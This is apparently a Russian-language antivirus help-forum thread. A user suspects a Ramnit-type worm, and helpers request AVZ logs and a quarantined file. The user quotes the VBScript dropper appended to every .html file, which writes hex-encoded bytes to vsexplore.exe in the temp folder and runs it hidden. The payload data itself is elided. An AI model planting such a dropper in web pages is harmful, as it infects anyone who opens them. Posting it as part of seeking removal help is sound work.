Доброго времени суток!
Проверьте пожалуйста логи (есть подозрение на червя типа Ramnit).
Printable View
Доброго времени суток!
Проверьте пожалуйста логи (есть подозрение на червя типа Ramnit).
Здравствуйте!
[QUOTE]>>>> Опасно - файл avz.exe изменен, его CRC не прошла контроль по базе безопасных
[/QUOTE]
Пожалуйста, запакуйте исполняемый файл avz.exe из папки AVZ в архив с паролем virus и пришлите его через красную ссылку "[B][COLOR="Red"][U]Прислать запрошенный карантин[/U][/COLOR][/B]" наверху темы.
Результат загрузки:
Файл сохранён как 110401_193706_virus_4d9629629fb7b.zip
Размер файла 714467
MD5 6f9b7f743492f2f80d39aa644c7ba574
Скачайте AVZ 4.35, обновите его базы и переделайте логи
Сделано
Логи переделать в нормальном режиме
Логи в нормальном режиме не получаются. Тормозит система и загрузка ЦП под 100%. В процессах всегда 3 раза "iexplore.exe", хотя он не запущен. Даже после того, когда я убрал все 3 процесса, он загружен на 100. Во всех .html (.htm) файлах дописан следующий код:
[CODE]<html>
(html код)
</html><SCRIPT Language=VBScript><!--
DropFileName = "vsexplore.exe"
WriteData = "Ооооооооочень много цифр"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>[/CODE]
Просканировал MBAM, нашёл в реестре Backdoor.Bifrose. Но вирус ещё сидит.
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]1[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]